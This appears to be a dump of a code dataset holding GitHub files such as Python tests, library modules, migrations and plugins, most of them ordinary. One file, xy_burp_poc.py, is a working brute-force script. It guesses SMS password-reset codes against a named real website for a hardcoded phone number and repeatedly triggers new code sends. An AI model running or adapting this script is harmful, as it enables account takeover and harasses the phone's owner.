| repo_name (string, 5–100 chars) | ref (string, 12–67 chars) | path (string, 4–244 chars) | copies (string, 1–8 chars) | content (string, 0–1.05M chars, nullable ⌀) |
|---|---|---|---|---|
dkushner/zipline
|
refs/heads/master
|
tests/test_exception_handling.py
|
20
|
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import TestCase
import zipline.utils.simfactory as simfactory
import zipline.utils.factory as factory
from zipline.test_algorithms import (
ExceptionAlgorithm,
DivByZeroAlgorithm,
SetPortfolioAlgorithm,
)
from zipline.finance.slippage import FixedSlippage
from zipline.utils.test_utils import (
drain_zipline,
setup_logger,
teardown_logger,
ExceptionSource,
)
DEFAULT_TIMEOUT = 15 # seconds
EXTENDED_TIMEOUT = 90
class ExceptionTestCase(TestCase):
def setUp(self):
self.zipline_test_config = {
'sid': 133,
'slippage': FixedSlippage()
}
setup_logger(self)
def tearDown(self):
teardown_logger(self)
def test_datasource_exception(self):
self.zipline_test_config['trade_source'] = ExceptionSource()
zipline = simfactory.create_test_zipline(
**self.zipline_test_config
)
with self.assertRaises(ZeroDivisionError):
output, _ = drain_zipline(self, zipline)
def test_exception_in_handle_data(self):
# Simulation
# ----------
self.zipline_test_config['algorithm'] = \
ExceptionAlgorithm(
'handle_data',
self.zipline_test_config['sid'],
sim_params=factory.create_simulation_parameters()
)
zipline = simfactory.create_test_zipline(
**self.zipline_test_config
)
with self.assertRaises(Exception) as ctx:
output, _ = drain_zipline(self, zipline)
self.assertEqual(str(ctx.exception),
'Algo exception in handle_data')
def test_zerodivision_exception_in_handle_data(self):
# Simulation
# ----------
self.zipline_test_config['algorithm'] = \
DivByZeroAlgorithm(
self.zipline_test_config['sid'],
sim_params=factory.create_simulation_parameters()
)
zipline = simfactory.create_test_zipline(
**self.zipline_test_config
)
with self.assertRaises(ZeroDivisionError):
output, _ = drain_zipline(self, zipline)
def test_set_portfolio(self):
"""
Are we protected against overwriting an algo's portfolio?
"""
# Simulation
# ----------
self.zipline_test_config['algorithm'] = \
SetPortfolioAlgorithm(
self.zipline_test_config['sid'],
sim_params=factory.create_simulation_parameters()
)
zipline = simfactory.create_test_zipline(
**self.zipline_test_config
)
with self.assertRaises(AttributeError):
output, _ = drain_zipline(self, zipline)
|
Antiun/odoo
|
refs/heads/8.0
|
openerp/addons/base/tests/test_ir_filters.py
|
64
|
# -*- coding: utf-8 -*-
import functools
from openerp import exceptions
from openerp.tests import common
def noid(d):
""" Removes values that are not relevant for the test comparisons """
d.pop('id', None)
d.pop('action_id', None)
return d
class FiltersCase(common.TransactionCase):
def build(self, model, *args):
Model = self.registry(model)
for vars in args:
Model.create(self.cr, common.ADMIN_USER_ID, vars, {})
class TestGetFilters(FiltersCase):
def setUp(self):
super(TestGetFilters, self).setUp()
self.USER = self.registry('res.users').name_search(self.cr, self.uid, 'demo')[0]
self.USER_ID = self.USER[0]
def test_own_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='c', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='d', user_id=self.USER_ID, model_id='ir.filters'))
filters = self.registry('ir.filters').get_filters(
self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', is_default=False, user_id=self.USER, domain='[]', context='{}'),
dict(name='b', is_default=False, user_id=self.USER, domain='[]', context='{}'),
dict(name='c', is_default=False, user_id=self.USER, domain='[]', context='{}'),
dict(name='d', is_default=False, user_id=self.USER, domain='[]', context='{}'),
])
def test_global_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=False, model_id='ir.filters'),
dict(name='c', user_id=False, model_id='ir.filters'),
dict(name='d', user_id=False, model_id='ir.filters'),
)
filters = self.registry('ir.filters').get_filters(
self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', is_default=False, user_id=False, domain='[]', context='{}'),
dict(name='b', is_default=False, user_id=False, domain='[]', context='{}'),
dict(name='c', is_default=False, user_id=False, domain='[]', context='{}'),
dict(name='d', is_default=False, user_id=False, domain='[]', context='{}'),
])
def test_no_third_party_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=common.ADMIN_USER_ID, model_id='ir.filters'),
dict(name='c', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='d', user_id=common.ADMIN_USER_ID, model_id='ir.filters') )
filters = self.registry('ir.filters').get_filters(
self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', is_default=False, user_id=False, domain='[]', context='{}'),
dict(name='c', is_default=False, user_id=self.USER, domain='[]', context='{}'),
])
class TestOwnDefaults(FiltersCase):
def setUp(self):
super(TestOwnDefaults, self).setUp()
self.USER = self.registry('res.users').name_search(self.cr, self.uid, 'demo')[0]
self.USER_ID = self.USER[0]
def test_new_no_filter(self):
"""
When creating a @is_default filter with no existing filter, that new
filter gets the default flag
"""
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'a',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=self.USER, is_default=True,
domain='[]', context='{}')
])
def test_new_filter_not_default(self):
"""
When creating a @is_default filter with existing non-default filters,
the new filter gets the flag
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'c',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=self.USER, is_default=False, domain='[]', context='{}'),
dict(name='b', user_id=self.USER, is_default=False, domain='[]', context='{}'),
dict(name='c', user_id=self.USER, is_default=True, domain='[]', context='{}'),
])
def test_new_filter_existing_default(self):
"""
When creating a @is_default filter where an existing filter is already
@is_default, the flag should be *moved* from the old to the new filter
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'c',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=self.USER, is_default=False, domain='[]', context='{}'),
dict(name='b', user_id=self.USER, is_default=False, domain='[]', context='{}'),
dict(name='c', user_id=self.USER, is_default=True, domain='[]', context='{}'),
])
def test_update_filter_set_default(self):
"""
When updating an existing filter to @is_default, if another filter
already has the flag, the flag should be moved
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'a',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=self.USER, is_default=True, domain='[]', context='{}'),
dict(name='b', user_id=self.USER, is_default=False, domain='[]', context='{}'),
])
class TestGlobalDefaults(FiltersCase):
def setUp(self):
super(TestGlobalDefaults, self).setUp()
self.USER = self.registry('res.users').name_search(self.cr, self.uid, 'demo')[0]
self.USER_ID = self.USER[0]
def test_new_filter_not_default(self):
"""
When creating a @is_default filter with existing non-default filters,
the new filter gets the flag
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=False, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'c',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=False, is_default=False, domain='[]', context='{}'),
dict(name='b', user_id=False, is_default=False, domain='[]', context='{}'),
dict(name='c', user_id=False, is_default=True, domain='[]', context='{}'),
])
def test_new_filter_existing_default(self):
"""
When creating a @is_default filter where an existing filter is already
@is_default, an error should be generated
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
with self.assertRaises(exceptions.Warning):
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'c',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
def test_update_filter_set_default(self):
"""
When updating an existing filter to @is_default, if another filter
already has the flag, an error should be generated
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
with self.assertRaises(exceptions.Warning):
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'a',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
def test_update_default_filter(self):
"""
Replacing the current default global filter should not generate any error
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
context_value = "{'some_key': True}"
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'b',
'model_id': 'ir.filters',
'user_id': False,
'context': context_value,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=False, is_default=False, domain='[]', context='{}'),
dict(name='b', user_id=False, is_default=True, domain='[]', context=context_value),
])
from openerp.tests.common import TransactionCase
class TestReadGroup(TransactionCase):
"""Test function read_group with groupby on a many2one field to a model
(in test, "user_id" to "res.users") which is ordered by an inherited not stored field (in
test, "name" inherited from "res.partners").
"""
def setUp(self):
super(TestReadGroup, self).setUp()
self.ir_filters_model = self.env['ir.filters']
self.res_partner_model = self.env['res.partner']
self.res_users_model = self.env['res.users']
def test_read_group_1(self):
self.assertEqual(self.res_users_model._order, "name, login", "Model res.users must be ordered by name, login")
self.assertFalse(self.res_users_model._fields['name'].store, "Field name is not stored in res.users")
filter_a = self.ir_filters_model.create(dict(name="Filter_A", model_id="ir.filters"))
filter_b = self.ir_filters_model.create(dict(name="Filter_B", model_id="ir.filters"))
filter_b.write(dict(user_id=False))
res = self.ir_filters_model.read_group([], ['name', 'user_id'], ['user_id'])
self.assertTrue(any(val['user_id'] == False for val in res), "At least one group must contain val['user_id'] == False.")
|
dezounet/datadez
|
refs/heads/master
|
tests/test_filter.py
|
1
|
from __future__ import unicode_literals, print_function
import unittest
from collections import defaultdict
import numpy as np
import pandas as pd
from datadez.filter import filter_small_occurrence
from datadez.filter import filter_empty
class TestFilter(unittest.TestCase):
def setUp(self):
self.df = pd.DataFrame({
'numeric': [1, 2, 3, 4, 5],
'mono-label': ['A', 'A', 'B', np.nan, 'C'],
'multi-label': [['A'], ['A', 'B'], ['B'], [], ['A', 'C', 'D']],
})
def test_filter_occurences_mono_label(self):
df = filter_small_occurrence(self.df, 'mono-label', 2)
# Check that rows have not been removed
self.assertEqual(len(df), len(self.df))
# Check occurrences are as expected
occurrences = df['mono-label'].value_counts(dropna=False)
self.assertEqual(occurrences['A'], 2)
self.assertEqual(occurrences.loc[occurrences.index.isnull()].values, 3)
self.assertListEqual(df['mono-label'].tolist(), ['A', 'A', np.nan, np.nan, np.nan])
def test_filter_occurrences_multi_label(self):
df = filter_small_occurrence(self.df, 'multi-label', 3)
# Check that rows have not been removed
self.assertEqual(len(df), len(self.df))
occurrences = defaultdict(int)
for entry in df['multi-label']:
for label in entry:
occurrences[label] += 1
# Check occurrences are as expected
self.assertEqual(len(occurrences), 1)
self.assertEqual(occurrences['A'], 3)
self.assertListEqual(df['multi-label'].tolist(), [['A'], ['A'], [], [], ['A']])
def test_filter_empty_mono_label(self):
df = filter_empty(self.df, ['mono-label'])
# Empty row for column 'mono-label' is filtered
self.assertEqual(len(df), 4)
self.assertListEqual(df['mono-label'].tolist(), ['A', 'A', 'B', 'C'])
def test_filter_empty_multi_label(self):
df = filter_empty(self.df, ['multi-label'])
# Empty row for column 'multi-label' is filtered
self.assertEqual(len(df), 4)
self.assertListEqual(df['multi-label'].tolist(), [['A'], ['A', 'B'], ['B'], ['A', 'C', 'D']])
if __name__ == "__main__":
unittest.main()
|
dogukantufekci/workplace_saas
|
refs/heads/master
|
workplace_saas/_apps/projects/__init__.py
|
12133432
| |
mapr/hue
|
refs/heads/hue-3.9.0-mapr
|
desktop/core/ext-py/Django-1.6.10/tests/select_related_regress/__init__.py
|
12133432
| |
Qalthos/ansible
|
refs/heads/devel
|
test/units/modules/net_tools/nios/__init__.py
|
12133432
| |
SMALLplayer/smallplayer-image-creator
|
refs/heads/master
|
storage/.xbmc/addons/script.module.urlresolver/lib/urlresolver/plugins/vidbull.py
|
3
|
'''
Vidbull urlresolver plugin
Copyright (C) 2013 Vinnydude
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from t0mm0.common.net import Net
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
import re, urllib2, os
from urlresolver import common
from lib import jsunpack
#SET ERROR_LOGO# THANKS TO VOINAGE, BSTRDMKR, ELDORADO
error_logo = os.path.join(common.addon_path, 'resources', 'images', 'redx.png')
net = Net()
class VidbullResolver(Plugin, UrlResolver, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "vidbull"
def __init__(self):
p = self.get_setting('priority') or 100
self.priority = int(p)
self.net = Net()
def get_media_url(self, host, media_id):
try:
url = self.get_url(host, media_id)
html = self.net.http_GET(url).content
data = {}
html = re.search('<Form(.+?)/Form', html, re.DOTALL).group(1)
r = re.findall(r'type="hidden"\s*name="(.+?)"\s*value="(.+?)"', html)
for name, value in r:
data[name] = value
common.addon.show_countdown(4, title='Vidbull', text='Loading Video...')
html = net.http_POST(url, data).content
sPattern = '<script type=(?:"|\')text/javascript(?:"|\')>eval\(function\(p,a,c,k,e,[dr]\)(?!.+player_ads.+).+?</script>'
r = re.search(sPattern, html, re.DOTALL + re.IGNORECASE)
if r:
sJavascript = r.group()
sUnpacked = jsunpack.unpack(sJavascript)
stream_url = re.search('[^\w\.]file[\"\']?\s*[:,]\s*[\"\']([^\"\']+)', sUnpacked)
if stream_url:
return stream_url.group(1)
raise Exception ('File Not Found or removed')
except urllib2.URLError, e:
common.addon.log_error(self.name + ': got http error %d fetching %s' %
(e.code, url))
common.addon.show_small_popup('Error','Http error: '+str(e), 8000, error_logo)
return self.unresolvable(code=3, msg=e)
except Exception, e:
common.addon.log('**** Vidbull Error occured: %s' % e)
common.addon.show_small_popup(title='[B][COLOR white]VIDBULL[/COLOR][/B]', msg='[COLOR red]%s[/COLOR]' % e, delay=5000, image=error_logo)
return self.unresolvable(code=0, msg=e)
def get_url(self, host, media_id):
return 'http://www.vidbull.com/%s' % media_id
def get_host_and_id(self, url):
r = re.search('//(.+?)/(?:embed-)?([0-9a-zA-Z]+)',url)
if r:
return r.groups()
else:
return False
return('host', 'media_id')
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
return (re.match('http://(www.)?vidbull.com/(?:embed-)?' +
'[0-9A-Za-z]+', url) or
'vidbull' in host)
|
airbnb/airflow
|
refs/heads/master
|
airflow/providers/apache/hive/transfers/mysql_to_hive.py
|
7
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains operator to move data from MySQL to Druid."""
from collections import OrderedDict
from tempfile import NamedTemporaryFile
from typing import Dict, Optional
import MySQLdb
import unicodecsv as csv
from airflow.models import BaseOperator
from airflow.providers.apache.hive.hooks.hive import HiveCliHook
from airflow.providers.mysql.hooks.mysql import MySqlHook
from airflow.utils.decorators import apply_defaults
class MySqlToHiveOperator(BaseOperator):
"""
Moves data from MySQL to Hive. The operator runs your query against
MySQL, stores the results in a local file, and then loads that file into a
Hive table.
If the ``create`` or ``recreate`` arguments are set to ``True``,
``CREATE TABLE`` and ``DROP TABLE`` statements are generated.
Hive data types are inferred from the cursor's metadata. Note that the
table generated in Hive uses ``STORED AS textfile``
which isn't the most efficient serialization format. If a
large amount of data is loaded and/or if the table gets
queried considerably, you may want to use this operator only to
stage the data into a temporary table before loading it into its
final destination using a ``HiveOperator``.
:param sql: SQL query to execute against the MySQL database. (templated)
:type sql: str
:param hive_table: target Hive table, use dot notation to target a
specific database. (templated)
:type hive_table: str
:param create: whether to create the table if it doesn't exist
:type create: bool
:param recreate: whether to drop and recreate the table at every
execution
:type recreate: bool
:param partition: target partition as a dict of partition columns
and values. (templated)
:type partition: dict
:param delimiter: field delimiter in the file
:type delimiter: str
:param quoting: controls when quotes should be generated by the csv writer.
It can take any of the csv.QUOTE_* constants.
:type quoting: str
:param quotechar: one-character string used to quote fields
containing special characters.
:type quotechar: str
:param escapechar: one-character string used by csv writer to escape
the delimiter or quotechar.
:type escapechar: str
:param mysql_conn_id: source mysql connection
:type mysql_conn_id: str
:param hive_conn_id: destination hive connection
:type hive_conn_id: str
:param tblproperties: TBLPROPERTIES of the hive table being created
:type tblproperties: dict
"""
template_fields = ('sql', 'partition', 'hive_table')
template_ext = ('.sql',)
ui_color = '#a0e08c'
@apply_defaults
def __init__( # pylint: disable=too-many-arguments
self,
*,
sql: str,
hive_table: str,
create: bool = True,
recreate: bool = False,
partition: Optional[Dict] = None,
delimiter: str = chr(1),
quoting: Optional[str] = None,
quotechar: str = '"',
escapechar: Optional[str] = None,
mysql_conn_id: str = 'mysql_default',
hive_cli_conn_id: str = 'hive_cli_default',
tblproperties: Optional[Dict] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.sql = sql
self.hive_table = hive_table
self.partition = partition
self.create = create
self.recreate = recreate
self.delimiter = str(delimiter)
self.quoting = quoting or csv.QUOTE_MINIMAL
self.quotechar = quotechar
self.escapechar = escapechar
self.mysql_conn_id = mysql_conn_id
self.hive_cli_conn_id = hive_cli_conn_id
self.partition = partition or {}
self.tblproperties = tblproperties
@classmethod
def type_map(cls, mysql_type: int) -> str:
"""Maps MySQL type to Hive type."""
types = MySQLdb.constants.FIELD_TYPE
type_map = {
types.BIT: 'INT',
types.DECIMAL: 'DOUBLE',
types.NEWDECIMAL: 'DOUBLE',
types.DOUBLE: 'DOUBLE',
types.FLOAT: 'DOUBLE',
types.INT24: 'INT',
types.LONG: 'BIGINT',
types.LONGLONG: 'DECIMAL(38,0)',
types.SHORT: 'INT',
types.TINY: 'SMALLINT',
types.YEAR: 'INT',
types.TIMESTAMP: 'TIMESTAMP',
}
return type_map.get(mysql_type, 'STRING')
def execute(self, context: Dict[str, str]):
hive = HiveCliHook(hive_cli_conn_id=self.hive_cli_conn_id)
mysql = MySqlHook(mysql_conn_id=self.mysql_conn_id)
self.log.info("Dumping MySQL query results to local file")
conn = mysql.get_conn()
cursor = conn.cursor()
cursor.execute(self.sql)
with NamedTemporaryFile("wb") as f:
csv_writer = csv.writer(
f,
delimiter=self.delimiter,
quoting=self.quoting,
quotechar=self.quotechar,
escapechar=self.escapechar,
encoding="utf-8",
)
field_dict = OrderedDict()
for field in cursor.description:
field_dict[field[0]] = self.type_map(field[1])
csv_writer.writerows(cursor)
f.flush()
cursor.close()
conn.close()
self.log.info("Loading file into Hive")
hive.load_file(
f.name,
self.hive_table,
field_dict=field_dict,
create=self.create,
partition=self.partition,
delimiter=self.delimiter,
recreate=self.recreate,
tblproperties=self.tblproperties,
)
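# A minimal usage sketch (comments only, not part of the original module): the
# DAG object, task_id, SQL, table name, and connection ids below are hypothetical
# and only illustrate how the constructor arguments documented above fit together.
#
#     mysql_to_hive = MySqlToHiveOperator(
#         task_id='mysql_to_hive_example',
#         sql='SELECT * FROM source_table',
#         hive_table='staging.source_table',
#         partition={'ds': '{{ ds }}'},
#         mysql_conn_id='mysql_default',
#         hive_cli_conn_id='hive_cli_default',
#         recreate=True,
#         dag=dag,
#     )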
|
gnieboer/tensorflow
|
refs/heads/master
|
tensorflow/contrib/stateless/__init__.py
|
48
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Stateless random ops which take seed as a tensor input.
Instead of taking `seed` as an attr which initializes a mutable state within
the op, these random ops take `seed` as an input, and the random numbers are
a deterministic function of `shape` and `seed`.
WARNING: These ops are in contrib, and are not stable. They should be
consistent across multiple runs on the same hardware, but only for the same
version of the code.
@@stateless_random_uniform
@@stateless_random_normal
@@stateless_truncated_normal
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import
from tensorflow.contrib.stateless.gen_stateless_random_ops import *
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
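# A minimal usage sketch (comments only; the shapes and seed values are
# illustrative). It shows the key point of the module docstring above: the seed
# is a tensor input, so the same (shape, seed) pair yields the same values.
#
#     import tensorflow as tf
#     from tensorflow.contrib import stateless
#
#     seed = tf.constant([1, 2], dtype=tf.int64)
#     x = stateless.stateless_random_uniform(shape=[2, 3], seed=seed)
#     y = stateless.stateless_random_uniform(shape=[2, 3], seed=seed)
#     # x and y evaluate to identical values for the same hardware and code version.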
|
xflows/clowdflows-backend
|
refs/heads/master
|
workflows/migrations/0004_widget_interaction_finished.py
|
1
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-10-03 08:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('workflows', '0003_auto_20160825_1107'),
]
operations = [
migrations.AddField(
model_name='widget',
name='interaction_finished',
field=models.BooleanField(default=False),
),
]
|
JianyuWang/nova
|
refs/heads/master
|
nova/api/openstack/compute/multiple_create.py
|
6
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from nova.api.openstack.compute.schemas import multiple_create as \
schema_multiple_create
from nova.api.openstack import extensions
from nova.i18n import _
ALIAS = "os-multiple-create"
MIN_ATTRIBUTE_NAME = "min_count"
MAX_ATTRIBUTE_NAME = "max_count"
RRID_ATTRIBUTE_NAME = "return_reservation_id"
class MultipleCreate(extensions.V21APIExtensionBase):
"""Allow multiple create in the Create Server v2.1 API."""
name = "MultipleCreate"
alias = ALIAS
version = 1
def get_resources(self):
return []
def get_controller_extensions(self):
return []
# use nova.api.extensions.server.extensions entry point to modify
# server create kwargs
# NOTE(gmann): This function is not supposed to use the 'body_deprecated_param'
# parameter, as that is in place to handle the scheduler_hint extension for V2.1.
def server_create(self, server_dict, create_kwargs, body_deprecated_param):
# min_count and max_count are optional. If they exist, they may come
# in as strings. Verify that they are valid integers and > 0.
# Also, we want to default 'min_count' to 1, and default
# 'max_count' to be 'min_count'.
min_count = int(server_dict.get(MIN_ATTRIBUTE_NAME, 1))
max_count = int(server_dict.get(MAX_ATTRIBUTE_NAME, min_count))
return_id = server_dict.get(RRID_ATTRIBUTE_NAME, False)
if min_count > max_count:
msg = _('min_count must be <= max_count')
raise exc.HTTPBadRequest(explanation=msg)
create_kwargs['min_count'] = min_count
create_kwargs['max_count'] = max_count
create_kwargs['return_reservation_id'] = return_id
def get_server_create_schema(self):
return schema_multiple_create.server_create
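# A minimal request-body sketch (comments only; all values are illustrative)
# showing the optional attributes this extension reads from a server create
# request before populating create_kwargs:
#
#     {"server": {"name": "vm", "imageRef": "<image-uuid>",
#                 "flavorRef": "<flavor-id>",
#                 "min_count": 2, "max_count": 5,
#                 "return_reservation_id": true}}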
|
hickford/cython
|
refs/heads/master
|
Doc/s5/ep2008/worker.py
|
33
|
class HardWorker(object):
u"Almost Sisyphus"
def __init__(self, task):
self.task = task
def work_hard(self):
for i in range(100):
self.task()
|
hijinks/python-bcet
|
refs/heads/master
|
random_points.py
|
1
|
#!/usr/bin/env python
# Use pixel difference and a Kirsch filter to pick a series of random points
import georasters as gr
import numpy as np
import matplotlib.pyplot as plt
from scipy import ndimage
import random
import string
import csv
diff_gr = gr.from_file('./output/diff.tif')
ndv, xsize, ysize, geot, projection, datatype = gr.get_geo_info('./output/diff.tif') # Raster information
edge_gr = gr.from_file('./output/k100.tif')
raster_bounds = diff_gr.bounds
lat_range = np.linspace(raster_bounds[0]+10, raster_bounds[2]-10, num=xsize, endpoint=False, retstep=False, dtype=float)
lon_range = np.linspace(raster_bounds[1]+10, raster_bounds[3]-10, num=ysize, endpoint=False, retstep=False, dtype=float)
npz = np.zeros(diff_gr.raster.shape)
npz[np.where(edge_gr.raster < 1)] = 1
npz[np.where(diff_gr.raster > 20)] = 0
npd = ndimage.binary_erosion(npz, iterations=1)
npd = npd+1
npd[np.where(diff_gr.raster < 1)] = 0
npd_gr = gr.GeoRaster(npd,
diff_gr.geot,
nodata_value=ndv,
projection=diff_gr.projection,
datatype=diff_gr.datatype)
npd_gr.to_tiff('./npd')
lon_random = np.random.choice(ysize, 20000)
lat_random = np.random.choice(xsize, 20000)
random_coords = np.vstack((lat_random,lon_random)).transpose()
random_coords_unique = np.vstack(tuple(row) for row in random_coords)
def valid_point(v):
if v > 1:
return True
i = 0
p = 0
with open('random_points3.csv', 'wb') as csvfile:
csvw = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
csvw.writerow(['Latitude', 'Longitude', 'Name'])
while p < 1000:
coord_r = random_coords_unique[i]
coord_lat = lat_range[coord_r[0]]
coord_lon = lon_range[coord_r[1]]
print([coord_lat,coord_lon])
if valid_point(npd_gr.map_pixel(coord_lat,coord_lon)):
label = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))
csvw.writerow([coord_lat, coord_lon, label])
p = p+1
i = i+1
|
xujun10110/Hammer
|
refs/heads/master
|
bin/xy_burp_poc.py
|
3
|
#!/usr/bin/python2.7
#coding:utf-8
import sys
import time
import requests
from concurrent import futures
phone = '+86-15869103136'
agent = 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16'
headers = {'User-Agent':agent}
def refreshCode():
url = 'http://www.zaijia.cn/user/password/sendSmsCode'
data={'phone':phone}
while True:
for i in range(5):
try:
a = requests.post(url,data=data,headers=headers)
if a.status_code == 200:
print 'refresh code success'
break
except Exception, e:
raise e
time.sleep(60*5) # send once every 5 minutes
def burpCode(code):
url = 'http://www.zaijia.cn/user/password/checkCode'
data = {'phone':phone,'sms_code':code}
for i in range(5):
try:
a = requests.post(url,data=data,headers=headers)
if a.status_code == 200 and 'true' in a.text:
print code,'success'
sys.exit()
else:
print code,'fail'
break
# exceptions caused by multiple threads
except Exception,e:
print 'Exception',e
pass
def main():
# fs = {}
with futures.ThreadPoolExecutor(max_workers=100) as executor: # default: 10 threads
time.clock()
executor.submit(refreshCode)
time.sleep(1)
for i in xrange(130000,134800):
future = executor.submit(burpCode,str(i))
print time.clock()
# ----------------------------------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------------------------------
if __name__=='__main__':
main()
# burpCode('134780')
pass
|
paulcalabro/zato
|
refs/heads/master
|
code/alembic/versions/0017_7baa0602_gh283_update_tls_outconns.py
|
7
|
"""gh283 update tls outconns
Revision ID: 0017_7baa0602
Revises: 0016_6669bb02
Create Date: 2014-07-18 14:47:05
"""
# revision identifiers, used by Alembic.
